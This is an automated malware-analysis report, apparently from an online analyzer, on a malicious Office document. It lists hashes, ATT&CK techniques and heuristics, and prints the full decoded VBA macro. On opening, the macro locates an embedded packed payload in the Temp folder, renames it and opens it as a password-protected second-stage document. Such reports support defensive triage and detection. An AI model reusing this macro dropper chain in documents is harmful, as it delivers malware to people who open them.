Office (OLE) malware analysis — malicious · d60f4f05c48c778a

MALICIOUS

Office (OLE)

521.5 KB Created: 2021-09-08 12:01:00 First seen: 2021-09-17

MD5: e1bfd913888da72cd36d8f559efb5a30 SHA-1: 2ff8795fbc06d5323f018a6279f9d75ef4c65048 SHA-256: d60f4f05c48c778ad9434ea64f0c83e9202d38ef8e1d9fb4502bff6aeac24f36

72 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro that executes upon opening. The macro attempts to download a second-stage payload, indicated by the 'Document_Open' subroutine and the extraction of an OLE package. The presence of a password-protected document ('reform.doc' with password '2281337') suggests a multi-stage infection process.

Heuristics 5

Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT

OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/2006/encryption In document text (OLE body)
- http://schemas.microsoft.com/office/2006/keyEncryptor/passwordIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/keyEncryptor/certificateIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2886 bytes
SHA-256: `0a06014613143cbe2a99a6668797fa75d777745e4cb0cc3d3e516c00f52b7709`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit Option Compare Text Dim hdv As String Dim bbbb As String Dim med As String Private Sub Document_Open() Dim dfgdgdg Dim kytrewwf As String kytrewwf = Options.DefaultFilePath(wdUserTemplatesPath) If Dir(kytrewwf & "\reform.doc") = "" Then Selection.MoveDown Unit:=wdLine, Count:=3 Selection.MoveRight Unit:=wdCharacter, Count:=2 Selection.MoveDown Unit:=wdLine, Count:=3 Selection.MoveRight Unit:=wdCharacter, Count:=2 Selection.TypeBackspace Call bvxfcsd If Len(hdv) > 2 Then Call nam(hdv) Call pppx(kytrewwf & "\reform.doc") ActiveDocument.Close End If End If End Sub Sub hdhdd(asda As String) Dim MyFSO As FileSystemObject Dim MyFile As File Dim SourceFolder As String Dim DestinationFolder As String Dim MyFolder As Folder Dim MySubFolder As Folder Set MyFSO = New Scripting.FileSystemObject Call Search(MyFSO.GetFolder(asda), hdv) End Sub Attribute VB_Name = "Module1" Sub pppx(spoc As String) Documents.Open FileName:=spoc, ConfirmConversions:=False, ReadOnly:= _ False, AddToRecentFiles:=False, PasswordDocument:="2281337", _ PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _ WritePasswordTemplate:="", Format:=wdOpenFormatAuto, XMLTransform:="" End Sub Sub ousx() Call uoia(Options.DefaultFilePath(wdUserTemplatesPath)) End Sub Attribute VB_Name = "Module3" Sub bvxfcsd() Selection.Copy Dim uuuuc uuuuc = Options.DefaultFilePath(wdUserTemplatesPath) Dim ewrwsdf As String ewrwsdf = "L" & "o" ewrwsdf = ewrwsdf & "c" & "a" & "l" ewrwsdf = ewrwsdf & "/" & "Temp" ntgs = 50 sda = 49 Dim kuls As String kuls = ewrwsdf While sda < 50 ntgs = ntgs - 1 If Dir(Left(uuuuc, ntgs) & kuls, vbDirectory) = "" Then Else sda = 61 End If Wend Call ThisDocument.hdhdd(Left(uuuuc, ntgs) & ewrwsdf) End Sub Attribute VB_Name = "Module123345" Dim pls As String Sub Search(mds As Object, pafs As String) Dim Nedc As Object Dim Ters As Object Dim fffff fffff = "reform.ioe" For Each Nedc In mds.SubFolders Search Nedc, pafs Next Nedc For Each Ters In mds.Files If Ters.Name = fffff Then pafs = Ters End If Next Ters Exit Sub ErrHandle: Err.Clear End Sub Sub nam(pafs As String) Call ousx Dim oxl oxl = "\reform.doc" Name pafs As pls & oxl End Sub Sub uoia(fffs As String) pls = fffs End Sub
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1692582292/Ole10Native	340801 bytes
SHA-256: `c14c2950f2bf2b0b9f45bae327f4a499e0e0703355490ddb15278dfc2f446340`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact entropy is 7.98, consistent with packed or encrypted content.
`ole10native_00_reform.ioe`	ole-package-payload	OLE Ole10Native payload: ObjectPool/_1692582292/Ole10Native; display_name=reform.ioe; full_path=C:\Users\MyPc\AppData\Local\Temp\reform.ioe; temp_path=; def_file=	340480 bytes
SHA-256: `28978a1c90c581fe12175afeb57e0c408b607997bcd60c188058a7aa7a1514cb`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact entropy is 7.98, consistent with packed or encrypted content.

Open this report in the interactive analyzer, or submit your own file for analysis.